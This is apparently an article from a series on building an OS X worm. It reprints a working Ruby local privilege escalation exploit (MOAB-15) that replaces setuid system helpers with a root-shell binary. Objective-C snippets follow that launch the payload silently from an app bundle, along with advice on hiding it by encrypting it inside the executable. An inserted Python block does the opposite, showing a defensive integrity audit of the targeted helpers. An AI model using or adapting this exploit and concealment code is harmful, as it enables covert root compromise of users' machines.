Rixstep

The Hackers Handbook — Penetration

It's easy to write a nasty worm for OS X. Here's how. Third of many parts.


The first article in this series discussed the ease with which worms can be propagated on OS X and highlighted two types of system flaws; the second article in this series discussed a method of propagation; this article will deal with actually attacking the target system.

Where Embed?

Presuming use of the simplest method of propagation - spreading a Cocoa bundle - one might also presume an attack that comes from a module embedded in the bundle - such as an executable in the Resources subdirectory. This is the easiest approach but not necessarily the ideal one; still, if this is the method chosen, it's very straightforward: one need only take the proof of concept from MOAB #15 and embed it.

#!/usr/bin/ruby

# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.

require 'fileutils'

DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"
AVAILABLE_TARGETS = [
    "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
    "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
    "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]

path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))

if File.exists?(path_to_bin)
    unless File.exists?(path_to_back)
        FileUtils.cp(path_to_bin, path_to_back)
    end
end

WRAP_CODE = 'int main() {setuid(0); setgid(0); seteuid(0); system("/bin/sh -i");}'
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -fr /tmp/t.c"
system(COMPILE)

FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)

Note the above code will not output anything - and you won't be executing this from a Terminal.app window anyway. The user sees nothing.

Note as well that the above snippet only establishes a root shell; if you want to do something more 'constructive' (destructive) you need to modify the code.
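To see what the trick leaves behind from the defender's side, here is an added example (mine, not the article's or the MOAB proof of concept's): a baseline-and-audit check over the three helper paths the script targets, flagging a helper whose contents changed while it carries the setuid bit. It assumes a constructed directory tree standing in for the volume root and digests recorded at run time, not real Apple binaries.

```python
import hashlib, os, stat, tempfile

# Helpers the MOAB-15 proof of concept targets (paths from the article, given
# relative to the volume root so the demo can run against a constructed tree).
MOAB15_TARGETS = [
    "Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
    "Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
    "Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool",
]

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def record_baseline(root, targets):
    """Digest each helper while the system is known good."""
    return {rel: sha256_of(os.path.join(root, rel)) for rel in targets}

def audit_setuid_helpers(root, baseline):
    """Return [(relative path, finding)] for helpers that no longer match the
    baseline; a replaced file carrying the setuid bit is flagged explicitly."""
    findings = []
    for rel, expected in baseline.items():
        path = os.path.join(root, rel)
        if not os.path.exists(path):
            findings.append((rel, "missing"))
        elif sha256_of(path) != expected:
            suid = bool(os.stat(path).st_mode & stat.S_ISUID)
            findings.append((rel, "replaced, setuid set" if suid else "replaced"))
    return findings

def demo():
    """Constructed scenario: fake helpers under a temp dir, a baseline taken
    while intact, then one helper swapped for other code and marked setuid."""
    root = tempfile.mkdtemp()
    for rel in MOAB15_TARGETS:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"original helper: " + rel.encode())
    baseline = record_baseline(root, MOAB15_TARGETS)
    victim = os.path.join(root, MOAB15_TARGETS[0])
    with open(victim, "wb") as f:
        f.write(b"attacker-supplied replacement")
    os.chmod(victim, 0o4755)  # the mode repairPermissions would restore
    return audit_setuid_helpers(root, baseline)
```

On a real system the baseline would be taken from a known-good install and stored off the machine; the audit then runs periodically or after any repairPermissions run.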

Running the Task

Presuming you've got someone to test your 'application' you must now run the above MOAB script within it. This too is completely straightforward.

#import <Foundation/Foundation.h>

void run_task(NSString *payload) {
    NSTask *task = [[NSTask alloc] init];

    // payload names a file in the bundle's Resources subdirectory
    [task setLaunchPath:[[NSBundle mainBundle] pathForResource:payload ofType:nil]];
    [task launch];
}

That's it - the above snippet will have a memory leak which you can address by declaring task outside at global scope and then adding yourself as a notification observer for NSTaskDidTerminateNotification, waiting for the task to complete and then releasing the object. But if you're trying to destroy computers you're not going to be too worried about a memory leak.

Greater Obfuscation

Of course the cautious user might peek inside the bundle before running it and become suspicious of a file marked with eXecutable bits. But there are ways around that.

For starters you don't have to have the file so marked - you can change the permissions on the file once your Cocoa application is up and running. To take things further you can embed the script in your Cocoa executable, write it out to disk at runtime, and run it from there. Further still, you can encrypt the script inside your Cocoa executable so nosy users who actually look inside still won't see anything suspicious.

Or you can use the entire script as a program argument to /usr/bin/ruby. Simply encrypt the script inside your Cocoa executable, decrypt it at runtime, and pass the entire string as argv[1] to the ruby interpreter.

#import <Foundation/Foundation.h>

void ruby_task(NSString *script) {
    NSTask *task = [[NSTask alloc] init];

    // the whole script is handed to the interpreter as its single argument
    [task setLaunchPath:@"/usr/bin/ruby"];
    [task setArguments:[NSArray arrayWithObject:script]];
    [task launch];
}

Whatever level of sophistication you choose you're bound to fool all but the most careful of users. And even a few pros will be caught with their pants down when you penetrate.

'TO BE CONTINUED'


Thanks to Devon at Pixel Groovy for the excellent artwork.

Copyright © Rixstep. All rights reserved.